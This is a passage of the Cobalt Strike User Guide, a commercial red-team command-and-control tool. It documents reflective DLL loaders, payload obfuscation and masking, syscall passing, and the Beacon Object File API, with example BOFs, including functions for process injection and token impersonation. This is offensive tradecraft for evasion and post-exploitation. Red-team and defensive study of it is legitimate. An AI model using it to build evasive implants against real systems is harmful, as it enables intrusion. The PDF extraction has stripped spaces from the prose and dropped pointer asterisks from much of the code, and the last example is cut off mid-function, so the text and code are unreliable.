MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader Using Post-ex User Defined Reflective DLL Loaders Create/Compileyour ReflectiveLoaders ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit. GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicensekeyisrequired.Pleasenote thatUserDefinedReflectiveLoadersforBeaconpayloadsandpost-expayloadsareverysimilar buthavesomesubtledifferences. TheloaderentryfunctioniscalledwiththeWinAPIcallingconvention,andittakesasingle LPVOIDargument.Therefore,theentryfunctionmustbedeclaredasfollows: void WINAPI ReflectiveLoader(LPVOID loaderArgument) Post-exploitationpayloadsassumethattheDLL'sentrypointiscalledwiththefollowingorder andarguments: DllMain(, DLL_PROCESS_ATTACH, ); DllMain(, 4, ); TheRDATA_SECTIONpointargumentisassomelong-runningpost-exploitationpayloads obfuscatetheir.rdatasectionduringthewaitingperiod.Itistheloader'sresponsibilitytoprovide thefollowingstructuretotheDLL: typedef struct { char* start; // The start address of the .rdata section DWORD length; // The length (Size of Raw Data) of the .rdata section DWORD offset; // The obfuscation start offset } RDATA_SECTION, *PRDATA_SECTION; TheobfuscationstartoffsetensuresthattheImportAddressTable(IAT)willnotbeobfuscated. Typically,thisvalueshouldbesettothesizeoftheIMAGE_DIRECTORY_ENTRY_IATData Directoryentryasfollows: rdata->offset = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ ENTRY_IAT].Size; User Defined Reflective DLL Loader CobaltStrikeUserGuide www.fortra.com page:164
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader CobaltStrike4.4addedsupportforusingcustomizedreflectiveloadersforbeaconpayloads. TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto Help -> ArsenalanddownloadtheUDRLKit.Yourlicencekeyisrequired. NOTE: Thereflectiveloader'sexecutablecodeistheextracted.textsectionfromauserprovided compiledobjectfile.Theextractedexecutablecodemustbelessthan100KB. Implementation ThefollowingAggressorscripthooksareprovidedtoallowimplementationofUserDefined ReflectiveLoaders: Function Description BEACON_RDLL_GENERATE HookusedtoimplementbasicReflectiveLoader replacement. BEACON_RDLL_SIZE Thishookiscalledwhenpreparingbeaconsand allowstheusertoconfiguremorethan5KBspace fortheirreflectiveloader(upto100KB).Thishook canalsobeusedtoremovetheentirespacefor thereflectiveloader. BEACON_RDLL_GENERATE_LOCAL HookusedtoimplementadvancedReflective Loaderreplacement.Additionalarguments providedincludeBeaconID,GetModuleHandleA address,andGetProcAddressaddress. ThefollowingAggressorscriptfunctionsareprovidedtoextracttheReflectiveLoader executablecode(.textsection)fromacompiledobjectfileandinserttheexecutablecodeinto thebeaconpayload: Function Description extract_reflective_loader ExtractstheReflectiveLoaderexecutablecode fromabytearraycontainingacompiledobjectfile. setup_reflective_loader InsertstheReflectiveLoaderexecutablecodeinto thebeaconpayload. ThefollowingAggressorscriptfunctionsareprovidedtomodifythebeaconpayloadusing informationfromtheMalleableC2profile: CobaltStrikeUserGuide www.fortra.com page:165
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader Function Description setup_strings ApplythestringsdefinedintheMalleableC2profile tothebeaconpayload. setup_transformations Applythetransformationrulesdefinedinthe MalleableC2profiletothebeaconpayload. ThefollowingAggressorscriptfunctionisprovidedtoobtaininformationaboutthebeacon payloadtoassistwithcustommodificationstothepayload: Function Description pedump Loadsamapofinformationaboutthebeacon payload.Thismapinformationissimilartothe outputofthe"peclone"commandwiththe"dump" argument. ThefollowingAggressorscriptfunctionsareprovidedtoperformcustommodificationstothe beaconpayload: NOTE: Dependingonthecustommodificationsmade(obfuscation,mask,etc...),thereflective loadermayhavetoreversethosemodificationswhenloading. Function Description pe_insert_rich_header InsertrichheaderdataintoBeaconDLLContent.If thereisexistingrichheaderinformation,itwillbe replaced. pe_mask MaskdataintheBeaconDLLContentbasedon positionandlength. pe_mask_section MaskdataintheBeaconDLLContentbasedon positionandlength. pe_mask_string MaskastringintheBeaconDLLContentbasedon position. pe_patch_code PatchcodeintheBeaconDLLContentbasedon find/replacein'.text'section'. pe_remove_rich_header RemovetherichheaderfromBeaconDLL Content. pe_set_compile_time_with_long SetthecompiletimeintheBeaconDLLContent. pe_set_compile_time_with_string SetthecompiletimeintheBeaconDLLContent. CobaltStrikeUserGuide www.fortra.com page:166
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader Function Description pe_set_export_name SettheexportnameintheBeaconDLLContent. pe_set_long Placesalongvalueataspecifiedlocation. pe_set_short Placesashortvalueataspecifiedlocation. pe_set_string Placesastringvalueataspecifiedlocation. pe_set_stringz Placesastringvalueataspecifiedlocationand addsazeroterminator. pe_set_value_at Setsalongvaluebasedonthelocationresolvedby anamefromthePEMap(seepedump). pe_stomp Setastringtonullcharacters.Startataspecified locationandsetsallcharacterstonulluntilanull stringterminatorisreached. pe_update_checksum UpdatethechecksumintheBeaconDLLContent. Using User Defined Reflective DLL Loaders Create/Compileyour ReflectiveLoaders TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto Help -> ArsenalanddownloadtheUDRLKit(yourlicensekeyisrequired). ThefollowingistheCobaltStrikeprocessforpreppingbeacons: l TheBEACON_RDLL_SIZEhookiscalledwhenpreparingbeacons. o Thisgivestheuserachancetoindicatethatmorethan5KBspacewillberequired fortheirreflectiveloader. o Userscanusebeaconswithspacereservedforareflectiveloaderupto100KB. o Whenoverridingavailablereflectiveloaderspaceinthebeacons,thebeaconswill bemuchlarger.Infact,theywillbetoolargeforstandardartifactsprovidedby CobaltStrike.Userswillneedtoupdatetheirprocesstousecustomizedartifacts withlargerreservedspaceforthelargerbeacons. o Thiscanbeusedtoremovethereflectiveloaderspacefrom theBeaconDLL. CobaltStrikeUserGuide www.fortra.com page:167
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader l Beaconsarepatchedwithrequiredsettingsaspayloaddata. o ThefollowingarepatchedintoBeaconsforUDRL: n ListenerSettings n SomeMalleableC2Settings. Usingsleepmaskanduserwxrequiresareflectiveloadercapableofcreating memoryforthe.textexecutablecodewithRWXpermissions,orthebeacon willcrashwhenmasking/unmaskingwriteprotectedmemory.Thedefault reflectiveloadersnormallyhandlethis. Usingsleepmaskandobfuscaterequiresareflectiveloadercapableof removingthe1st4Kblock(Header)oftheDLLastheheaderwillnotbe masked. o ThefollowingisNOTpatchedintoBeaconsforUDRL: n PEModifications l BEACON_RDLL_GENERATEisnormallycalled.BEACON_RDLL_GENERATE_LOCALhook iscalledwhen: o Thefollowingdetermineswhichiscalled: n MalleableC2has“.stage.smartinject”seton. o Useextract_reflective_loaderfunctiontoextractthereflectiveloader. o Usesetup_reflective_loaderfunctiontopatchtheextractedreflectiveloaderinto thereflectiveloaderspaceintheBeacons. n Iftheloaderistoobigfortheselectedbeacon,youwillseeamessagelike this: o ReflectiveDLLContentlength(123456)exceedsavailablespace (5120). n Use“BEACON_RDLL_SIZE”touseabeaconswithlargerReflectiveLoaders. o Thereareadditionalfunctionsavailabletohelpinspectandmakemodificationsto theBeaconsbasedontheReflectiveLoaderscapabilities.Forexample: n Provideobfuscation n Patchinaddressesforsmartinjectsupport l Beaconsarepatchedintoartifacts. o Beaconsthathavebeenbuiltwiththelargerreflectiveloaderspace(per“BEACON_ RDLL_SIZE”above)willneedtobeloadedintocustomizedartifactswithspaceto holdlargebeacons. o GotoHelp -> Arsenalfrom alicensedCobaltStriketodownloadtheArtifactKit. o Seethe“stagesize”referencesintheseartifactkitfilesprovidedbyCobaltStrike: n See“stagesize”referencesinartifactbuildscript. n See“stagesize”referencesin‘script.example’ CobaltStrikeUserGuide www.fortra.com page:168
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader Beacon User Data BeaconUserData(BUD)isaC-structurethatallowsReflectiveLoaderstopassadditionaldata toBeacons.Youcandownloadthebeacon_user_data.hfilehere.Inaddition,theudrl-vskitin theArsenalKitincludesanexampleBUDloader. PassingBeaconUserData TheBUDispassedasapointertotheBeaconbycallingBeacon'sDllMainfunctionwitha customreasoningknownasDLL_BEACON_USER_DATA(0x0d).TheBUDmustbegivento BeaconbeforethestandardDLL_PROCESS_ATTACHreasonisinvoked. BeaconcopiesnecessaryvaluesfromtheBUDduringtheDLL_USER_DATAcall,andthereforeit isnotrequiredtokeeptheBUDstructureinmemoryafterthecall. VersionNumber ThefirstvaluecontainedwithintheBUDstructureistheversionnumber.Thisversionnumberis essentialinensuringbackwardcompatibilitybetweendifferentversionsofBeaconsand ReflectiveLoaderssinceitallowsnewerBeaconstohandleandutilizetheolderBUDstructure withoutcrashing. Theversionnumberusesthefollowingformat:0xMMmmPP,where: l MM=CobaltStrike’smajorversionnumber l mm =CobaltStrike’sminorversionnumber l PP=CobaltStrike’spatchversionnumber Forexample,0x040900translatestoversionCS 4.9. System Calls BeaconUserDataallowsaReflectiveLoadertoresolveandpasssystemcallinformationto Beacon,whichovertakesBeacon'sdefaultsystemcallresolver.SeeSystem Calls on page 41 tolearnmore. BeaconUserDatahasanSYSCALL_API_ENTRYstructureforeachsupportedSystemCall,and theSYSCALL_APIstructureholdstheseentries.Theentrycontainsthefollowingvalues CobaltStrikeUserGuide www.fortra.com page:169
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader l jmpAddr:TheaddressofthecorrectSystem Callinstructiondependingonsystem architecture: o x64:thesyscallinstruction o WOW64(32-bitonx64):FastSysCallinWOW64 o Nativex86:KiFastSystemCall l sysnum:TheSystem Callnumber l fnAddr:TheaddressofthecorrespondingNt*function ThejmpAddrandsysnumvaluesarerequiredforindirectSystemCalls,andfnAddrisrequired fordirectSystemCalls.Ifthevalueiszero,BeaconfallsbacktothecorrespondingWinAPIcall. Theuser-definedSystemCallinformationisskippedifthesyscallsfieldsintheUSER_DATA structurepointstoNULL. Custom Data BeaconUserDataallowsaReflectiveLoadertopassasmall(32bytes)databuffertoBeacon. BeaconObjectFiles(BOFs)canretrieveapointertothisdatawiththe BeaconGetCustomUserDatafunction. CobaltStrikeUserGuide www.fortra.com page:170
BeaconObjectFiles/WhataretheadvantagesofBOFs? Beacon Object Files ABeaconObjectFile(BOF)isacompiledCprogram,writtentoaconventionthatallowsitto executewithinaBeaconprocessanduseinternalBeaconAPIs.BOFsareawaytorapidly extendtheBeaconagentwithnewpost-exploitationfeatures. What are the advantages of BOFs? Oneofthekeyrolesofacommand&controlplatformistoprovidewaystouseexternalpost- exploitationfunctionality.CobaltStrikealreadyhastoolstousePowerShell,.NET,andReflective DLLs.ThesetoolsrelyonanOPSECexpensivefork&runpatternthatinvolvesaprocesscreate andinjectionforeachpost-exploitationaction.BOFshavealighterfootprint.Theyruninsideofa Beaconprocessandarememorycanbecontrolledusingthemalleablec2profilewithinthe process-injectblock. BOFsarealsoverysmall.AUACbypassprivilegeescalationReflectiveDLLimplementationmay weighinat100KB+.Thesameexploit,builtasaBOF,is<3KB.Thiscanmakeabigdifference whenusingbandwidthconstrainedchannels,suchasDNS. Finally,BOFsareeasytodevelop.YoujustneedaWin32Ccompilerandacommandline.Both MinGWandMicrosoft'sCcompilercanproduceBOFfiles.Youdon'thavetofusswithproject settingsthataresometimesmoreeffortthanthecodeitself. How do BOFs work? ToBeacon,aBOFisjustablockofposition-independentcodethatreceivespointerstosome BeaconinternalAPIs. ToCobaltStrike,aBOFisanobjectfileproducedbyaCcompiler.CobaltStrikeparsesthisfile andactsasalinkerandloaderforitscontents.Thisapproachallowsyoutowriteposition- independentcode,foruseinBeacon,withouttediousgymnasticstomanagestringsand dynamicallycallWin32APIs. What are the disadvantages of BOFs? BOFsaresingle-fileCprogramsthatcallWin32APIsandlimitedBeaconAPIs.Don'texpectto linkinotherfunctionalityorbuildlargeprojectswiththismechanism. CobaltStrikedoesnotlinkyourBOFtoalibc.Thismeansyou'relimitedtocompilerintrinsics (e.g.,__stosbonVisualStudioformemset),theexposedBeaconinternalAPIs,Win32APIs,and CobaltStrikeUserGuide www.fortra.com page:171
BeaconObjectFiles/HowdoIdevelopaBOF? thefunctionsthatyouwrite.Expectthatalotofcommonfunctions(e.g.,strlen,stcmp,etc.)are notavailabletoyouviaaBOF. BOFsexecuteinsideofyourBeaconagent.IfaBOFcrashes,youorafriendyouvaluewilllose access.WriteyourBOFscarefully. CobaltStrikeexpectsthatyourBOFsaresingle-threadedprogramsthatrunforashortperiodof time.BOFswillblockotherBeacontasksandfunctionalityfromexecuting.ThereisnoBOF patternforasynchronousorlong-runningtasks.Ifyouwanttobuildalong-runningcapability, consideraReflectiveDLLthatrunsinsideofasacrificialprocess. How do I develop a BOF? OpenyourpreferredtexteditorandstartwritingaCprogram.Here'saHelloWorldBOF: #include <windows.h> #include "beacon.h" void go(char * args, int alen) { BeaconPrintf(CALLBACK_OUTPUT, "Hello World: %s", args); } Downloadbeacon.h. TocompilethiswithVisualStudio: cl.exe /c /GS- hello.c /Fohello.o Tocompilethiswithx86MinGW: i686-w64-mingw32-gcc -c hello.c -o hello.o Tocompilethiswithx64MinGW: x86_64-w64-mingw32-gcc -c hello.c -o hello.o Thecommandsaboveproduceahello.ofile.Useinline-executeinBeacontoruntheBOF. beacon> inline-execute /path/to/hello.o these are arguments beacon.hcontainsdefinitionsforseveralinternalBeaconAPIs.Thefunctiongoissimilarto maininanyotherCprogram.It'sthefunctionthat'scalledbyinline-executeandargumentsare CobaltStrikeUserGuide www.fortra.com page:172
BeaconObjectFiles/DynamicFunctionResolution passedtoit.BeaconOutputisaninternalBeaconAPItosendoutputtotheoperator.Notmuch toit. Dynamic Function Resolution GetProcAddress,LoadLibraryA,GetModuleHandle,andFreeLibraryareavailablewithinBOF files.YouhavetheoptiontousethesetoresolveWin32APIsyouwishtocall.Anotheroptionis touseDynamicFunctionResolution(DFR). DynamicFunctionResolutionisaconventiontodeclareandcallWin32APIsas LIBRARY$Function.ThisconventionprovidesBeaconwiththeinformationitneedstoexplicitly resolvethespecificfunctionandmakeitavailabletoyourBOFfilebeforeitruns.Whenthis processfails,CobaltStrikewillrefusetoexecutetheBOFandtellyouwhichfunctionitcouldn't resolve. Here'sanexampleBOFthatusesDFR andlooksupthecurrentdomain: #include <windows.h> #include <stdio.h> #include <dsgetdc.h> #include "beacon.h" DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); void go(char * args, int alen) { DWORD dwRet; PDOMAIN_CONTROLLER_INFO pdcInfo; dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo); if (ERROR_SUCCESS == dwRet) { BeaconPrintf(CALLBACK_OUTPUT, "%s", pdcInfo->DomainName); } NETAPI32$NetApiBufferFree(pdcInfo); } TheabovecodemakesDFR callstoDsGetDcNameAandNetApiBufferFreefromNETAPI32. WhenyoudeclarefunctionprototypesforDynamicFunctionResolution,paycloseattentionto thedecoratorsattachedtothefunctiondeclaration.Keywords,suchasWINAPIand DECLSPEC_IMPORTareimportant.Thesedecorationsprovidethecompilerwiththeneeded hintstopassargumentsandgeneratetherightcallinstruction. CobaltStrikeUserGuide www.fortra.com page:173
BeaconObjectFiles/AggressorScriptandBOFs Aggressor Script and BOFs You'lllikelywanttouseAggressorScripttorunyourfinalizedBOFimplementationswithin CobaltStrike.ABOFisagoodplacetoimplementalateralmovementtechnique,anescalation ofprivilegetool,oranewreconnaissancecapability. The&beacon_inline_executefunctionisAggressorScript'sentrypointtorunaBOFfile.Hereisa scripttorunasimpleHelloWorldprogram: alias hello { local('$barch $handle $data $args');
figure out the arch of this session
$barch = barch($1);
read in the right BOF file
$handle = openf(script_resource("hello. $+ $barch $+ .o")); $data = readb($handle, -1); closef($handle);
pack our arguments
$args = bof_pack($1, "zi", "Hello World", 1234);
announce what we're doing
btask($1, "Running Hello BOF");
execute it.
beacon_inline_execute($1, $data, "demo", $args); } Thescriptfirstdeterminesthearchitectureofthesession.Anx86BOFwillonlyruninanx86 Beaconsession.Conversely,anx64BOFwillonlyruninanx64Beaconsession.Thisscriptthen readstargetBOFintoanAggressorScriptvariable.Thenextstepistopackourarguments.The &bof_packfunctionpacksargumentsinawaythatiscompatiblewithBeacon'sinternaldata parserAPI.Thisscriptusesthecustomary&btasktologtheactiontheuseraskedBeaconto perform.And,&beacon_inline_executerunstheBOFwithitsarguments. The&beacon_inline_executefunctionacceptstheBeaconIDasthefirstargument,astring containingtheBOFcontentasasecondargument,theentrypointasitsthirdargument,andthe packedargumentsasitsfourthargument.Theoptiontochooseanentrypointexistsincase youchoosetocombinelike-functionalityintoasingleBOF. HereistheCprogramthatcorrespondstotheabovescript: CobaltStrikeUserGuide www.fortra.com page:174
BeaconObjectFiles/BOFCAPI /*
- Compile with:
- x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
- i686-w64-mingw32-gcc -c hello.c -o hello.x86.o / #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #include "beacon.h" void demo(char * args, int length) { datap parser; char * str_arg; int num_arg; BeaconDataParse(&parser, args, length); str_arg = BeaconDataExtract(&parser, NULL); num_arg = BeaconDataInt(&parser); BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg); } Thedemofunctionisourentrypoint.Wedeclarethedatapstructureonthestack.Thisisan emptyanduninitiatedstructurewithstateinformationforextractingargumentspreparedwith &bof_pack.BeaconDataParseinitializesourparser.BeaconDataExtractextractsalength- prefixedbinaryblobfromourarguments.Ourpackfunctionhasoptionstopackbinaryblobsas zero-terminatedstringsencodedtothesession'sdefaultcharacterset,azero-terminatedwide- characterstring,orabinaryblobwithouttransformation.TheBeaconDataIntextractsaninteger thatwaspackedintoourarguments.BeaconPrintfisonewaytoformatoutputandmakeit availabletotheoperator. BOF C API Data Parser API TheDataParserAPIextractsargumentspackedwithAggressorScript's&bof_packfunction. Extractalength-prefixedbinaryblob.ThesizeargumentmaybeNULL.Ifanaddressisprovided, thesizeispopulatedwiththenumber-of-bytesextracted. charBeaconDataExtract(datapparser,intsize) Extracta4binteger. CobaltStrikeUserGuide www.fortra.com page:175
BeaconObjectFiles/BOFCAPI intBeaconDataInt(datapparser) Gettheamountofdatalefttoparse. intBeaconDataLength(datapparser) Prepareadataparsertoextractargumentsfromthespecifiedbuffer. voidBeaconDataParse(datapparser,charbuffer,intsize) Extracta2binteger. shortBeaconDataShort(datapparser) Output API TheOutputAPIreturnsoutputtoCobaltStrike. FormatandpresentoutputtotheBeaconoperator. voidBeaconPrintf(inttype,charfmt,...) SendoutputtotheBeaconoperator. voidBeaconOutput(inttype,char*data,intlen) Eachofthesefunctionsacceptsatypeargument.ThistypedetermineshowCobaltStrikewill processtheoutputandwhatitwillpresenttheoutputas.Thetypesare: CALLBACK_OUTPUTisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16 (internally)usingthetarget'sdefaultcharacterset. CALLBACK_OUTPUT_OEMisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16 (internally)usingthetarget'sOEMcharacterset.Youprobablywon'tneedthis,unless you'redealingwithoutputfromcmd.exe. CALLBACK_ERRORisagenericerrormessage. CALLBACK_OUTPUT_UTF8isgenericoutput.CobaltStrikewillconvertthisoutputtoUTF- 16(internally)fromUTF-8. Format API TheformatAPIisusedtobuildlargeorrepeatingoutput. CobaltStrikeUserGuide www.fortra.com page:176
BeaconObjectFiles/BOFCAPI Allocatememorytoformatcomplexorlargeoutput. voidBeaconFormatAlloc(formatpobj,intmaxsz) Appenddatatothisformatobject. voidBeaconFormatAppend(formatpobj,chardata,intlen) Freetheformatobject. voidBeaconFormatFree(formatpobj) Appenda4binteger(bigendian)tothisobject. voidBeaconFormatInt(formatpobj,intval) Appendaformattedstringtothisobject. voidBeaconFormatPrintf(formatpobj,charfmt,...) Resetstheformatobjecttoitsdefaultstate(priortore-use). voidBeaconFormatReset(formatpobj) Extractformatteddataintoasinglestring.Populatethepassedinsizevariablewiththelength ofthisstring.TheseparametersaresuitableforusewiththeBeaconOutputfunction. charBeaconFormatToString(formatpobj,int*size) Internal APIs ThefollowingfunctionsmanipulatethetokenusedinthecurrentBeaconcontext: ApplythespecifiedtokenasBeacon'scurrentthreadtoken.Thiswillreportthenewtokentothe usertoo.ReturnsTRUEifsuccessful.FALSEisnot. BOOLBeaconUseToken(HANDLEtoken) Dropthecurrentthreadtoken.UsethisoverdirectcallstoRevertToSelf.Thisfunctioncleansup otherstateinformationaboutthetoken. voidBeaconRevertToken() ReturnsTRUEifBeaconisinahigh-integritycontext. CobaltStrikeUserGuide www.fortra.com page:177
BeaconObjectFiles/BOFCAPI BOOLBeaconIsAdmIn() ThefollowingfunctionsprovidesomeaccesstoBeacon'sprocessinjectioncapability: Populatethespecifiedbufferwiththex86orx64spawntovalueconfiguredforthisBeacon session. voidBeaconGetSpawnTo(BOOLx86,charbuffer,intlength) Thisfunctionspawnsatemporaryprocessaccountingforppid,spawnto,andblockdllsoptions. GrabthehandlefromPROCESS_INFORMATIONtoinjectintoormanipulatethisprocess. ReturnsTRUEifsuccessful. BOOLBeaconSpawnTemporaryProcess(BOOLx86,BOOLignoreToken, STARTUPINFOsInfo,PROCESS_INFORMATIONpInfo) Thisfunctionwillinjectthespecifiedpayloadintoanexistingprocess.Usepayload_offsetto specifytheoffsetwithinthepayloadtobeginexecution.Theargvalueisforarguments.argmay beNULL. voidBeaconInjectProcess(HANDLEhProc,intpid,charpayload,intpayload_len, intpayload_offset,chararg,intarg_len) ThisfunctioninjectsthespecifiedpayloadintoatemporaryprocessthatyourBOFoptedto launch.Usepayload_offsettospecifytheoffsetwithinthepayloadtobeginexecution.Thearg valueisforarguments.argmaybeNULL. voidBeaconInjectTemporaryProcess(PROCESS_INFORMATIONpInfo,char* payload,intpayload_len,intpayload_offset,chararg,intarg_len) Thisfunctioncleansupsomehandlesthatareoftenforgottenabout.Callthiswhenyou'redone interactingwiththehandlesforaprocess.Youdon'tneedtowaitfortheprocesstoexitorfinish. voidBeaconCleanupProcess(PROCESS_INFORMATIONpInfo) ThefollowingfunctionsareusedtoaccessstoreditemsinBeaconDataStore: Returnsapointertothespecificitem.Ifthereisnoentryatthatindex,thefunctionreturns NULL. PDATA_STORE_OBJECTBeaconDataStoreGetItem(size_tindex) ThisfunctionobfuscatesaspecificiteminBeaconDataStore. voidBeaconDataStoreProtectItem(size_tindex) CobaltStrikeUserGuide www.fortra.com page:178
BeaconObjectFiles/BOFCAPI Thisfunctionun-obfuscatesaspecificiteminBeaconDataStore. voidBeaconDataStoreUnprotectItem(size_tindex) ReturnthemaximumsizeofBeaconDataStore. size_tBeaconDataStoreMaxEntries() Thefollowingfunctionisautilityfunction: Convertthesrc stringtoaUTF16-LEwide-characterstring,usingthetarget'sdefaultencoding. max isthesize(inbytes!)ofthedestinationbuffer. BOOLtoWideChar(charsrc,wchar_tdst,intmax) Thisfunctionreturnsinformationaboutbeaconsuchasthebeaconaddress,sectionstomask, heaprecordstomask,themask,sleepmaskaddressandsleepmasksizeinformation. voidBeaconInformation(BEACON_INFOinfo); ThefollowingfunctionsprovideaccesstoBeacon'skeyvaluestore: Thisfunctionaddsamemoryaddresstoaninternalkeyvaluestoretoallowtheabilityto retrievethisvalueusingthekeyinasubsequentBOFexecution. BOOLBeaconAddValue(constcharkey,voidptr); Thisfunctionretrievesthememoryaddressthatisassociatedwiththekey fromtheinternal keyvaluestore.IfthekeyisnotfoundthenNULLisreturned. voidBeaconGetValue(constcharkey); Thisfunctionremovesthekey fromtheinternalkeyvaluestore.Thiswillnotdoanymemory cleanupofthememoryaddressandafinialexecutionofaBOFshoulddothenecessaryclean upinordertopreventmemoryleaks. BOOLBeaconRemoveValue(constcharkey); ThefollowingfunctionretrievesthecustomdatabufferfromBeaconUserData. char*BeaconGetCustomUserData() WhenaUserDefinedReflectiveLoaderprovidesBeaconUserData(BUD)duringtheloading process,thenthisfunctionwillreturnapointertothecustombufferarrayassociatedwiththe BUD.Thesizeofthisbufferarrayisfixedat32bytes,asdefinedintheUSER_DATAstructure.A CobaltStrikeUserGuide www.fortra.com page:179
BeaconObjectFiles/FormattingBOFOutput validmemorypointerisalwaysreturned.IfnoBUDisprovidedbytheUserDefinedReflective Loader,thenthepointeristothedefaultbufferarraywithall32valuessettozero. Formatting BOF Output ThebeaconformatAPIallowsyoutomodifyhowbeaconreturnsdatatotheusertosuitthe usersNeed.Datareturnedinaloopisanobviousexampleanduse-caseforthisAPI. WithouttheBeaconFormatAPI,beaconwillsendtheoutputbacktoyoueverytimeyouusethe BeaconPrintfAPIcall.Thiscouldleadtoformattingthatislessthanideal. Thebestwaytoillustratetheproblemisbyusingsomeexamples. Example - Simple counting BOF using a loop: CountingBOFExample 1 #include <windows.h> 2 #include "beacon.h" 3 #include "bofdefs.h" 4 5 void LoopExample() 6 { 7 int i; 8 for(i=0;i<11;i++) 9 { 10 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i); 11 } 12 } 13 14 void go(char * args, int len) { 15 LoopExample(); 16 } Whenthecodeisexecuted,youshouldseethefollowingresult: CobaltStrikeUserGuide www.fortra.com page:180
BeaconObjectFiles/FormattingBOFOutput figure68-Example1Output Asexpected,theoutputisservedbackinchunks,displayingspacinginbetweeneventhougha newlinecharacterwasnotspecifiedbecauseBeaconPrintfautomaticallyaddsanewlinefor you. IfyoumodifytheBeaconObjectFiletousetheBeaconFormatAPIinstead,youcangainmore controloverwhattheoutputlookslikewithfollowingsteps:
- First,allocatememorytoformattheoutput.
- Oncethebufferisallocatedandthereisapointertothebuffer,appendtothebuffer usingtheappendAPIslikeBeaconFormatAppend,BeaconFormatintand BeaconFormatPrintf.
- Whensatisfiedwiththebuffer,printitoutusingBeaconFormatToString
- Afterwards,youcaneitherreusethebufferforadditionaloperationsusing BeaconFormatResetor,ifyouaredonewithit,freeuptheallocatedmemoryusing BeaconFormatFree. Example - Using this approach in the counting BOF CountingBOFExample2 1 #include <windows.h> 2 #include "beacon.h" 3 #include "bofdefs.h" 4 CobaltStrikeUserGuide www.fortra.com page:181
BeaconObjectFiles/FormattingBOFOutput 5 void LoopExampleWithFormatting() 6 { 7 //1. create the new buffer pointer 8 formatp buffer; 9 10 //2. allocate memory to hold the formatted data 11 BeaconFormatAlloc(&buffer,1024); 12 13 int i; 14 for(i=0;i<11;i++) 15 { 16 //3. instead of printing, we will now fill the buffer - notice the new line character! 17 BeaconFormatPrintf(&buffer, "counter is currently at: %i\n",i); 18 } 19 20 //4. now that we have our filled up buffer, let's print it out 21 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL)); 22 23 //5. time to free up the buffer 24 BeaconFormatFree(&buffer); 25 } 26 27 void LoopExample() 28 { 29 int i; 30 for(i=0;i<11;i++) 31 { 32 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i); 33 } 34 } 35 36 void go(char * args, int len) { 37 LoopExampleWithFormatting(); 38 } Whenthecodeisexecuted,youshouldseethefollowingresult: CobaltStrikeUserGuide www.fortra.com page:182
BeaconObjectFiles/FormattingBOFOutput Example - Read the virtual memory of the current process ReadVirtualMemoryExample 1 #include <windows.h> 2 #include "beacon.h" 3 #include "bofdefs.h" 4 5 HMODULE GetModHandle(LPCSTR module) 6 { 7 HMODULE hModule = KERNEL32$GetModuleHandleA(module); 8 return hModule ? hModule : KERNEL32$LoadLibraryA(module); 9 } 10 11 LPVOID GetMemptr(LPCSTR module, LPCSTR function) 12 { 13 HMODULE hModule = GetModHandle(module); 14 LPVOID memPtr = KERNEL32$GetProcAddress(hModule,function); 15 return memPtr? memPtr : NULL; 16 } 17 18 //format options: 1 decompile format, any other number - raw opcodes 19 void ReadvirtualMemory(LPCSTR module, LPCSTR function,int size, int format) 20 { 21 LPVOID memPtr = GetMemptr(module,function); 22 if(!memPtr) 23 { 24 BeaconPrintf(CALLBACK_ERROR,"no memptr found\n"); CobaltStrikeUserGuide www.fortra.com page:183
BeaconObjectFiles/FormattingBOFOutput 25 return; 26 } 27 else 28 { 29 formatp buffer; 30 BeaconFormatAlloc(&buffer,1024); 31 BYTE readbuffer = (BYTE)MSVCRT$malloc(size); 32 SIZE_T bytesread = 0; 33 KERNEL32$ReadProcessMemory((HANDLE)-1,memPtr,readbuffer,size,&bytesread); 34 BeaconFormatPrintf(&buffer, "showing the first %i opcodes of %s!%s\n",size,module,function); 35 36 for(int i = 0; i < size; i++) 37 { 38 if(format == 1) 39 { 40 BeaconFormatPrintf(&buffer,"\x%02X",readbuffer[i]); 41 } 42 else 43 { 44 BeaconFormatPrintf(&buffer,"%02X",readbuffer[i]); 45 } 46 } 47 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL)); 48 BeaconFormatFree(&buffer); 49 MSVCRT$free(readbuffer); 50 } 51 } 52 void go(char * args, int len) { 53 char* module; 54 char* function; 55 int size; 56 int format; 57 datap parser; 58 BeaconDataParse(&parser, args, len); 59 module = BeaconDataExtract(&parser,NULL); 60 function = BeaconDataExtract(&parser,NULL); 61 size = BeaconDataInt(&parser); CobaltStrikeUserGuide www.fortra.com page:184
